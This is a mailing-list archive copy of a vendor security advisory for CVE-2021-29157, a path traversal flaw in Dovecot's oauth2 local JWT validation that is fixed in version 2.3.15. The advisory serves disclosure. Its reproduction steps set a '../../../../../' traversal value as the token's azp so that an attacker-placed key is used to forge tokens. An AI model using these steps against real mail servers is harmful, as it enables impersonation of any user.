<!--X-Body-Begin-->
<!--X-User-Header-->
oss-sec
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->
By Date
By Thread
</form>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
CVE-2021-29157: Dovecot oauth2 JWT local validation path traversal
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
From: Aki Tuomi <aki.tuomi () dovecot fi>
Date: Mon, 28 Jun 2021 09:58:23 +0300 (EEST)
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
Open-Xchange Security Advisory 2021-06-28
Affected product: Dovecot IMAP Server
Vendor: OX Software GmbH
Internal reference: DOP-2159
Vulnerability type: Path Traversal (CWE-24)
Vulnerable version: 2.3.11
Vulnerable component: oauth2
Report confidence: Confirmed
Solution status: Fixed in 2.3.15
Researcher credits: Kirin of Tencent Security Xuanwu Lab.
Vendor notification: 2021-03-22
CVE reference: CVE-2021-29157
CVSS: 6.7 (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
Vulnerability Details:
If attacker can gain access to local filesystem, it is possible to trick Dovecot to use attacker specified key to
validate tokens.
Steps to reproduce:
Configure Dovecot to perform OAUTH2 authentication with local JWT validation using posix fs driver.
Place base64 encoded HS256 shared key in a location that is readable by dovecot, and use
../../../../../location/to/path as key azp.
You can now forge tokens and authenticate as any valid user.
Risk:
Attacker can gain access using forged credentials.
Solution:
Upgrade to fixed version.
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
By Date
By Thread
Current thread:
CVE-2021-29157: Dovecot oauth2 JWT local validation path traversal Aki Tuomi (Jun 28)
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->